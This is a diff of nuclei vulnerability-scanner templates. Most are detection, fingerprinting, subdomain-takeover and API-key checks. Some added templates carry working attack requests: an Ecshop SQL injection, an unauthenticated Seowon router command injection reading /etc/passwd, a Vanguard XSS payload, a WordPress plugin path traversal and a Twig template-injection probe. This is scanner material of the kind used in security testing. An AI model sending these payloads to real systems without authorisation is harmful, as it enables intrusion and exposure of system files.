- type: word
|
||||||
|
words:
|
||||||
|
- 'extranet\Anonymous'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 404
|
|
@ -0,0 +1,17 @@
|
||||||
|
id: samba-detection
|
||||||
|
info:
|
||||||
|
name: samba detection
|
||||||
|
author: pussycat0x
|
||||||
|
severity: info
|
||||||
|
tags: network,smb, samba
|
||||||
|
network:
|
||||||
|
- inputs:
|
||||||
|
- data: 000000a4ff534d4272000000000801400000000000000000000000000000400600000100008100025043204e4554574f524b2050524f4752414d20312e3000024d4943524f534f4654204e4554574f524b5320312e303300024d4943524f534f4654204e4554574f524b5320332e3000024c414e4d414e312e3000024c4d312e3258303032000253616d626100024e54204c414e4d414e20312e3000024e54204c4d20302e313200
|
||||||
|
type: hex
|
||||||
|
host:
|
||||||
|
- "{{Hostname}}"
|
||||||
|
- "{{Hostname}}:139"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "SMBr"
|
|
@ -11,7 +11,13 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<h1>Oops! We couldn’t find that page.</h1>"
|
- "<h1>Oops! We couldn’t find that page.</h1>"
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '!contains(host,"bigcartel.com")'
|
||||||
|
|
|
@ -16,11 +16,11 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- There is no helpdesk here!
|
- 'There is no helpdesk here!'
|
||||||
- Maybe this is still fresh!
|
- 'May be this is still fresh!'
|
||||||
|
- 'freshdesk.com/signup'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: word
|
- type: dsl
|
||||||
words:
|
dsl:
|
||||||
- "freshservice.com"
|
- '!contains(host,"freshpo.com")'
|
||||||
negative: true
|
|
|
@ -12,8 +12,13 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "There isn't a GitHub Pages site here."
|
- "There isn't a GitHub Pages site here."
|
||||||
- "For root URLs (like http://example.com/) you must provide an index.html file"
|
- "For root URLs (like http://example.com/) you must provide an index.html file"
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '!contains(host,"githubapp.com")'
|
||||||
|
|
|
@ -12,8 +12,18 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Sorry, this shop is currently unavailable."
|
|
||||||
- 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"'
|
- 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"'
|
||||||
|
- "Sorry, this shop is currently unavailable."
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'shop-not-found'
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '!contains(host,"myshopify.com")'
|
|
@ -12,9 +12,14 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- Whatever you were looking for doesn't currently exist at this address.
|
- Whatever you were looking for doesn't currently exist at this address.
|
||||||
- There's nothing here.
|
- There's nothing here.
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '!contains(host,"tumblr.com")'
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: fastjson-version
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Fastjson Version Detection
|
||||||
|
author: yuansec
|
||||||
|
severity: info
|
||||||
|
description: If the server returns an exception to the client,The fastjson version will be retrieved,Fastjson versions greater than 1.2.41,Contains the latest version(1.2.76).
|
||||||
|
reference: https://blog.csdn.net/caiqiiqi/article/details/107907489
|
||||||
|
tags: fastjson,tech
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"@type":"java.lang.AutoCloseable"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'fastjson-version'
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'fastjson-version.*([0-9]\.[0-9]+\.[0-9]+)'
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: sitecore-default-page
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Sitecore Default Page
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"Welcome to Sitecore"
|
||||||
|
tags: tech,sitecore
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Welcome to Sitecore"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -2,16 +2,25 @@ id: weblogic-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Weblogic
|
name: Detect Weblogic
|
||||||
author: bing0o
|
author: pdteam
|
||||||
severity: info
|
severity: info
|
||||||
tags: tech,weblogic
|
tags: tech,weblogic
|
||||||
|
metadata:
|
||||||
|
shodan-query: product:"Oracle Weblogic"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/console/login/LoginForm.jsp"
|
- "{{BaseURL}}/{{randstr}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "WebLogic"
|
- "From RFC 2068"
|
||||||
|
- "Error 404--Not Found"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 404
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: AbuseIPDB API Test
|
name: AbuseIPDB API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://docs.abuseipdb.com/
|
reference:
|
||||||
|
- https://docs.abuseipdb.com/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md
|
||||||
tags: token-spray,abuseipdb
|
tags: token-spray,abuseipdb
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: AlienVault Open Threat Exchange (OTX) API Test
|
name: AlienVault Open Threat Exchange (OTX) API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://otx.alienvault.com/api
|
reference:
|
||||||
|
- https://otx.alienvault.com/api
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md
|
||||||
tags: token-spray,alienvault
|
tags: token-spray,alienvault
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: AniAPI API Test
|
name: AniAPI API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://aniapi.com/docs/authentication
|
reference:
|
||||||
|
- https://aniapi.com/docs/authentication
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Anime/AniAPI.md
|
||||||
tags: token-spray,aniapi
|
tags: token-spray,aniapi
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: Cooper Hewitt API
|
name: Cooper Hewitt API
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://collection.cooperhewitt.org/api/methods/
|
reference:
|
||||||
|
- https://collection.cooperhewitt.org/api/methods/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md
|
||||||
tags: token-spray,cooperhewitt
|
tags: token-spray,cooperhewitt
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: api-covalent
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Covalent API Test
|
||||||
|
author: daffainfo
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://www.covalenthq.com/docs/api/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md
|
||||||
|
tags: token-spray,covalent
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"address":'
|
||||||
|
- '"updated_at":'
|
||||||
|
- '"next_update_at":'
|
||||||
|
condition: and
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: Dribbble API Test
|
name: Dribbble API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://developer.dribbble.com/v2/
|
reference:
|
||||||
|
- https://developer.dribbble.com/v2/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md
|
||||||
tags: token-spray,dribbble
|
tags: token-spray,dribbble
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: api-etherscan
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Etherscan API Test
|
||||||
|
author: daffainfo
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://docs.etherscan.io/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Etherscan.md
|
||||||
|
tags: token-spray,etherscan
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.etherscan.io/api?module=account&action=balance&address=0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae&tag=latest&apikey={{token}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
negative: true
|
||||||
|
words:
|
||||||
|
- 'Invalid API Key'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"status":'
|
||||||
|
- '"message":"OK"'
|
||||||
|
condition: and
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: Europeana API Test
|
name: Europeana API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://pro.europeana.eu/page/search
|
reference:
|
||||||
|
- https://pro.europeana.eu/page/search
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md
|
||||||
tags: token-spray,europeana
|
tags: token-spray,europeana
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: IUCN API Test
|
name: IUCN API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: http://apiv3.iucnredlist.org/api/v3/docs
|
reference:
|
||||||
|
- http://apiv3.iucnredlist.org/api/v3/docs
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md
|
||||||
tags: token-spray,iucn
|
tags: token-spray,iucn
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: MyAnimeList API Test
|
name: MyAnimeList API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://myanimelist.net/apiconfig/references/api/v2
|
reference:
|
||||||
|
- https://myanimelist.net/apiconfig/references/api/v2
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Anime/MyAnimeList.md
|
||||||
tags: token-spray,myanimelist
|
tags: token-spray,myanimelist
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -0,0 +1,28 @@
|
||||||
|
id: api-nownodes
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Nownodes API Test
|
||||||
|
author: daffainfo
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://nownodes.io/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Nownodes.md
|
||||||
|
tags: token-spray,nownodes
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET https://bsc-blockbook.nownodes.io/api HTTP/1.1
|
||||||
|
Host: bsc-blockbook.nownodes.io
|
||||||
|
api-key: {{token}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"coin":'
|
||||||
|
- '"host":'
|
||||||
|
- '"version":'
|
||||||
|
condition: and
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: Rijksmuseum API Test
|
name: Rijksmuseum API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://data.rijksmuseum.nl/user-generated-content/api/
|
reference:
|
||||||
|
- https://data.rijksmuseum.nl/user-generated-content/api/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md
|
||||||
tags: token-spray,rijksmuseum
|
tags: token-spray,rijksmuseum
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: TheCatApi API Test
|
name: TheCatApi API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://docs.thecatapi.com/
|
reference:
|
||||||
|
- https://docs.thecatapi.com/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md
|
||||||
tags: token-spray,thecatapi
|
tags: token-spray,thecatapi
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: api-thedogapi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: TheDogApi API Test
|
||||||
|
author: daffainfo
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://docs.thedogapi.com/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheDogApi.md
|
||||||
|
tags: token-spray,thedogapi
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.thedogapi.com/v1/votes"
|
||||||
|
headers:
|
||||||
|
x-api-key: "{{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'id":'
|
||||||
|
- 'image_id":'
|
||||||
|
- 'sub_id":'
|
||||||
|
condition: and
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: URLScan API Test
|
name: URLScan API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://urlscan.io/docs/api/
|
reference:
|
||||||
|
- https://urlscan.io/docs/api/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md
|
||||||
tags: token-spray,urlscan
|
tags: token-spray,urlscan
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: VirusTotal API Test
|
name: VirusTotal API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://developers.virustotal.com/reference#getting-started
|
reference:
|
||||||
|
- https://developers.virustotal.com/reference
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md
|
||||||
tags: token-spray,virustotal
|
tags: token-spray,virustotal
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: ecshop-sqli
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ecshop SQLi
|
||||||
|
author: Lark-lab,ImNightmaree
|
||||||
|
severity: high
|
||||||
|
reference:
|
||||||
|
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
|
||||||
|
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
|
||||||
|
tags: sqli,php,ecshop
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /user.php?act=login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'XPATH syntax error:'
|
||||||
|
- '[error] =>'
|
||||||
|
- '[0] => Array'
|
||||||
|
- 'MySQL server error report:Array'
|
||||||
|
condition: and
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: seowon-router-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Seowon 130-SLC router - Remote Code Execution (Unauthenticated)
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
description: Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page
|
||||||
|
reference: https://www.exploit-db.com/exploits/50295
|
||||||
|
tags: rce,seowon,router,unauth
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Referer: {{BaseURL}}/diagnostic.html?t=201701020919
|
||||||
|
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
|
||||||
|
Connection: keep-alive
|
||||||
|
|
||||||
|
Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,19 +5,21 @@ info:
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: high
|
severity: high
|
||||||
description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
|
description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
|
||||||
tags: php,ssti
|
tags: php,ssti,twig
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D"
|
- "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D"
|
||||||
|
|
||||||
|
skip-variables-check: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- "1788906"
|
- "1788906"
|
||||||
part: body
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 404
|
- 404
|
||||||
|
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: vanguard-post-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Vanguard Marketplace CMS ≤ 2.1
|
||||||
|
author: ImNightmaree
|
||||||
|
severity: medium
|
||||||
|
description: Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box
|
||||||
|
reference: https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html
|
||||||
|
tags: vanguard,xss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /search HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: ad-widget-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0)
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
description: Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
|
||||||
|
reference:
|
||||||
|
- https://cxsecurity.com/issue/WLB-2017100084
|
||||||
|
- https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
|
||||||
|
tags: wordpress,wp-plugin,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -1,10 +1,10 @@
|
||||||
id: rdf-user-enumeration
|
id: wordpress-rdf-user-enum
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Wordpress RDF User Enumeration
|
name: Wordpress RDF User Enumeration
|
||||||
author: r3dg33k
|
author: r3dg33k
|
||||||
severity: info
|
severity: info
|
||||||
tags: wordpress
|
tags: wordpress,enum
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -36,4 +36,4 @@ requests:
|
||||||
part: body
|
part: body
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '<dc:creator><!\[CDATA\[([a-z]+)\]\]><\/dc:creator>'
|
- '<dc\:creator><\!\[CDATA\[(.*?)\]\]></dc'
|
|
@ -0,0 +1,10 @@
|
||||||
|
id: gocd-workflow
|
||||||
|
info:
|
||||||
|
name: GoCD Security Checks
|
||||||
|
author: dhiyaneshDk
|
||||||
|
description: A simple workflow that runs all GoCD Pipeline related nuclei templates on a given target.
|
||||||
|
|
||||||
|
workflows:
|
||||||
|
- template: exposed-panels/gocd-login.yaml
|
||||||
|
subtemplates:
|
||||||
|
- tags: gocd
|
|
@ -0,0 +1,13 @@
|
||||||
|
id: sitecore-workflow
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SiteCore Security Checks
|
||||||
|
author: pdteam
|
||||||
|
description: A simple workflow that runs all SiteCore related nuclei templates on a given target.
|
||||||
|
|
||||||
|
workflows:
|
||||||
|
- template: technologies/sitecore-default-page.yaml
|
||||||
|
- template: exposed-panels/sitecore-login.yaml
|
||||||
|
subtemplates:
|
||||||
|
- tags: vulnerabilities/sitecore-pre-auth-rce.yaml
|
||||||
|
- template: misconfiguration/sitecore-debug-page.yaml
|
Loading…
Reference in New Issue